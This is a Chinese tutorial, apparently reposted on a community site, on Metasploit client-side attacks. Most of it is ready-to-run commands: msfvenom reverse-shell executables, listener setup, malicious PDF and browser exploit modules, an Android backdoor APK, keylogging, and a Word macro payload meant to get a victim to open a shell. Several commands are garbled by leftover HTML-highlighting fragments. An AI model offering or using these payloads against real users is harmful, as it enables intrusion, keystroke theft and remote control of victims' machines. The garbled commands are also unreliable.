Metasploit framework(七)——客户端渗透


留胡子笑季节
留胡子笑季节 2022-09-26 14:29:28 50679
分类专栏: 资讯

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

在无法突破网络边界的情况下转而攻击客户端有一些思路,如:
1、社会工程学攻击
2、进而渗透线上业务网络
3、透过含有漏洞利用代码的WEB站点,即:利用客户端漏洞
4、含有漏洞利用代码的DOC、PDF等文档
5、诱骗被害者执行Payload

思路举例:

诱骗被害者执行Payload,先生成可执行程序:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 

将可执行程序发送到客户端等待客户端运行,同时本地msf侦听开启:

  1. msfconsole -q
  2. use exploit/multi/handler 
  3. set payload windows/shell/reverse_tcp
  4. set LHOST 1.1.1.1
  5. set LPORT 4444
  6. exploit


含有漏洞利用代码的DOC、PDF等文档,举例:

(PDF阅读器利用下面的客户端程序的漏洞实现攻击)
利用Acrobat Reader漏洞执行Payload
首先构造PDF文件:

  1. exploit/windows/fileformat/adobe_utilprintf 
  2. set payload meterpreter/reverse_tcp
  3. set lhost
  4. set lport
  5. run

被攻击者的电脑的阅读器如果存在漏洞,那么将被执行成功取得shell。
扩展:当取得meterpreter后,可以执行例如以下命令对目标的控制:

  1. use priv 
  2. run post/windows/capture/keylog_recorder (知道对方正在敲击的键盘)


利用Flash插件漏洞执行payload(要对应相同的版本)
 

  1. use exploit-operator">/multi-operator">/browser-operator">/adobe_flash_hacking_team_uaf 
  2. use exploit-operator">/multi-operator">/browser-operator">/adobe_flash_opaque_background_uaf 


利用IE浏览器漏洞执行payload

use exploit-operator">/windows-operator">/browser-operator">/ms14_064_ole_code_execution


利用JRE漏洞执行payload
 

  1. use exploit-operator">/multi-operator">/browser-operator">/java_jre17_driver_manager 
  2. use exploit-operator">/multi-operator">/browser-operator">/java_jre17_jmxbean 
  3. use exploit-operator">/multi-operator">/browser-operator">/java_jre17_reflection_types 


生成Android后门程序

  1. use payload/android/meterpreter/reverse_tcp 
  2. generate -f -selector-tag">a.apk --selector-tag">p android -t raw

VBScript感染方式:
利用宏感染word、Excel文档,从而绕过某些基于文件类型检查的安全机制
先生成VBScript脚本:

msfvenom -a x86 --platform windows -p windows/ meterpreter/reverse_tcp LHOST=172.20.10.11 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe 

再在文档中添加生成的payload:
:视图---->宏---->创建
    payload第一部分粘入VBA代码;
    payload第二部分(data)粘入word文档正文;
最后Msf启动侦听

  1. use exploit/multi/handler 
  2. set payload windows/meterpreter/reverse_tcp

只要被攻击者点击文档,那么就能够取得shell。


 

网站声明:如果转载,请联系本站管理员。否则一切后果自行承担。

本文链接:https://www.xckfsq.com/news/show.html?id=10410
赞同 0
评论 0 条
留胡子笑季节L0
粉丝 0 发表 6 + 关注 私信
上周热门
如何使用 StarRocks 管理和优化数据湖中的数据?  2944
【软件正版化】软件正版化工作要点  2864
统信UOS试玩黑神话:悟空  2823
信刻光盘安全隔离与信息交换系统  2718
镜舟科技与中启乘数科技达成战略合作,共筑数据服务新生态  1251
grub引导程序无法找到指定设备和分区  1217
华为全联接大会2024丨软通动力分论坛精彩议程抢先看!  164
点击报名 | 京东2025校招进校行程预告  163
2024海洋能源产业融合发展论坛暨博览会同期活动-海洋能源与数字化智能化论坛成功举办  161
华为纯血鸿蒙正式版9月底见!但Mate 70的内情还得接着挖...  157
本周热议
我的信创开放社区兼职赚钱历程 40
今天你签到了吗? 27
如何玩转信创开放社区—从小白进阶到专家 15
信创开放社区邀请他人注册的具体步骤如下 15
方德桌面操作系统 14
用抖音玩法闯信创开放社区——用平台宣传企业产品服务 13
我有15积分有什么用? 13
如何让你先人一步获得悬赏问题信息?(创作者必看) 12
2024中国信创产业发展大会暨中国信息科技创新与应用博览会 9
中央国家机关政府采购中心:应当将CPU、操作系统符合安全可靠测评要求纳入采购需求 8

加入交流群

请使用微信扫一扫!